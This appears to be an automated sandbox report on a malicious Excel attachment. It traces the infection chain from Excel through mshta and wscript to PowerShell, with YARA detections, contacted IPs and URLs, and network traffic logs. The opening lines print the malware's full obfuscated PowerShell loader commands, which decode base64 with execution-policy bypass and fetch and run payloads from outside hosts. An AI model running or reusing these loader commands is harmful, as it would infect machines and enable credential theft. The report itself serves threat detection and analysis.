[system.text.encoding]::utf8.getstring([system.convert]::frombase64string($caviloso));invoke-expression $bernarda	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je95q1a0tjj6rklbicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1ltujlukrfrklusvrpt04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagewpcr1usc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbmcixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagierfcsx1aw50icagicagicagicagicagicagicagicagicagicagicbuved5vhnbbudpayxjbnrqdhigicagicagicagicagicagicagicagicagicagicagietbrkspoycgicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicaiafdyzhhtvwfxzyigicagicagicagicagicagicagicagicagicagicagic1uyu1fu1bhy2ugicagicagicagicagicagicagicagicagicagicagifj3vudyuiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagje95q1a0tjj6rklbojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtq2ljcwljexmy4ymdavmjmxl3nlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmb3j1lnrjriisiirftly6qvbqrefuqvxzzwv0agvizxn0bwfnawnhbhroawduc2dpdmvnb29kzm8udmjtiiwwldapo3n0qxjulxnsrwvwkdmpo0lpicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxhnlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmby52ylmi'+[char]0x22+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je95q1a0tjj6rklbicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1ltujlukrfrklusvrpt04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagewpcr1usc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbmcixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagierfcsx1aw50icagicagicagicagicagicagicagicagicagicagicbuved5vhnbbudpayxjbnrqdhigicagicagicagicagicagicagicagicagicagicagietbrkspoycgicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicaiafdyzhhtvwfxzyigicagicagicagicagicagicagicagicagicagicagic1uyu1fu1bhy2ugicagicagicagicagicagicagicagicagicagicagifj3vudyuiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagje95q1a0tjj6rklbojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtq2ljcwljexmy4ymdavmjmxl3nlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmb3j1lnrjriisiirftly6qvbqrefuqvxzzwv0agvizxn0bwfnawnhbhroawduc2dpdmvnb29kzm8udmjtiiwwldapo3n0qxjulxnsrwvwkdmpo0lpicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxhnlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmby52ylmi'+[char]0x22+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $caviloso = 'jglkaw9lbgvjdhjpy2lkywrlid0gj2h0dhbzoi8vmtaxni5mawxlbwfpbc5jb20vyxbpl2zpbguvz2v0p2zpbgvrzxk9sfrvr19fexj1rfiwt0fasdbisep5zxbvclhtdkzfatzqogj3zvrlv0jddte5egnialfonvrrc2e0t0cwtxfjy3fxtkxszyzwa192awq9ztaxmdk2mzhjowjmyjk1nze3mzi3otqzntzhmwzmnmmgjzskdxj1z3vhaw8gpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrlbmnlzmfsyxj0bya9icr1cnvndwfpby5eb3dubg9hzerhdgeojglkaw9lbgvjdhjpy2lkywrlktskahltzw5vdg9tawegpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzygkzw5jzwzhbgfydg8poyrpbnrlcm1pyxigpsanpdxcqvnfnjrfu1rbulq+pic7jgnvcglvc2ftzw50zsa9icc8pejbu0u2nf9ftkq+pic7jhryyxnsywrhcia9icroew1lbm90b21pys5jbmrlee9mkcrpbnrlcm1pyxipoyryzxnwb25kb25hid0gjgh5bwvub3rvbwlhlkluzgv4t2yojgnvcglvc2ftzw50zsk7jhryyxnsywrhciatz2ugmcatyw5kicryzxnwb25kb25hic1ndcakdhjhc2xhzgfyoyr0cmfzbgfkyxigkz0gjgludgvybwlhci5mzw5ndgg7jgvtcgvsawnhcia9icryzxnwb25kb25hic0gjhryyxnsywrhcjskdw5ndwlmb3jtzsa9icroew1lbm90b21pys5tdwjzdhjpbmcojhryyxnsywrhciwgjgvtcgvsawnhcik7jg1vbgrpbmegpsatam9pbiaojhvuz3vpzm9ybwuuvg9dagfyqxjyyxkoksb8iezvckvhy2gtt2jqzwn0ihsgjf8gfslblteuli0ojhvuz3vpzm9ybwuutgvuz3rokv07jhjhymlzywx0b25hid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygkbw9szgluysk7jg9jzwfub2xvz2lzdgegpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcryywjpc2fsdg9uysk7jgfscglyy2hlid0gw2rubglilklplkhvbwvdlkdlde1ldghvzcgnvkfjjyk7jgfscglyy2hllkludm9rzsgkbnvsbcwgqcgndhh0lkfaukhiqvovmtmylzawmi4zmteumdcunjqxly86chr0accsicckcmvzc3vwaw5hcicsicckcmvzc3vwaw5hcicsicckcmvzc3vwaw5hcicsicdhc3buzxrfy29tcglszxinlcanjhjlc3n1cgluyxinlcanjhjlc3n1cgluyxinlcckcmvzc3vwaw5hcicsjyryzxnzdxbpbmfyjywnjhjlc3n1cgluyxinlcckcmvzc3vwaw5hcicsjyryzxnzdxbpbmfyjywnmscsjyryzxnzdxbpbmfyjykpow==';$bernarda = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($caviloso));invoke-expression $bernarda

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match	File source: 27.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000002.509298031.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Multi AV Scanner detection for submitted file

Source: Yara match	File source: 27.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000002.509298031.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.215.209.77	ip.1016.filemail.com	Canada	32156	HUMBER-COLLEGECA	true
188.114.96.6	linkjago.me	European Union	13335	CLOUDFLARENETUS	false
188.114.97.6	unknown	European Union	13335	CLOUDFLARENETUS	false
146.70.113.200	unknown	United Kingdom	2018	TENET-1ZA	true

Contacted Domains

Name	IP	Active
linkjago.me	188.114.96.6	true
ip.1016.filemail.com	142.215.209.77	true
1016.filemail.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta	true	Avira URL Cloud: safe	unknown
http://146.70.113.200/231/seethebestmagicalthignsgivegoodforu.tIF	true	Avira URL Cloud: safe	unknown
http://146.70.113.200/231/ZAHHRZA.txt	true	Avira URL Cloud: safe	unknown
https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c	true	Avira URL Cloud: safe	unknown

AV Detection

Source: PO#BBGR2411PO69.xls

Virustotal: Detection: 7%

Perma Link

Yara detected HtmlPhish44

Source: Yara match	File source: 27.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000002.509298031.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Phishing

Source: Yara match

File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemebestthingsgivenmegood[1].hta, type: DROPPED

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 142.215.209.77:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 142.215.209.77:443 -> 192.168.2.22:49172 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Document exploit detected (process start blacklist hit)

Source: unknown	HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.22:49163 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.22:49169 version: TLS 1.2

Source:	Binary string: .pdb>Uxx source: powershell.exe, 00000013.00000002.490184350.000000001AB44000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.pdb source: powershell.exe, 00000008.00000002.448366945.00000000024F4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.pdbhP source: powershell.exe, 00000013.00000002.485237811.0000000002593000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.pdbhP source: powershell.exe, 00000008.00000002.448366945.00000000024F4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.pdb source: powershell.exe, 00000013.00000002.485237811.0000000002593000.00000004.00000800.00020000.00000000.sdmp

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\mshta.exe

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Potential document exploit detected (performs DNS queries)

Source: global traffic	DNS query: name: linkjago.me
Source: global traffic	DNS query: name: linkjago.me
Source: global traffic	DNS query: name: linkjago.me
Source: global traffic	DNS query: name: linkjago.me
Source: global traffic	DNS query: name: 1016.filemail.com
Source: global traffic	DNS query: name: 1016.filemail.com
Source: global traffic	DNS query: name: linkjago.me
Source: global traffic	DNS query: name: linkjago.me
Source: global traffic	DNS query: name: linkjago.me
Source: global traffic	DNS query: name: 1016.filemail.com
Source: global traffic	DNS query: name: 1016.filemail.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
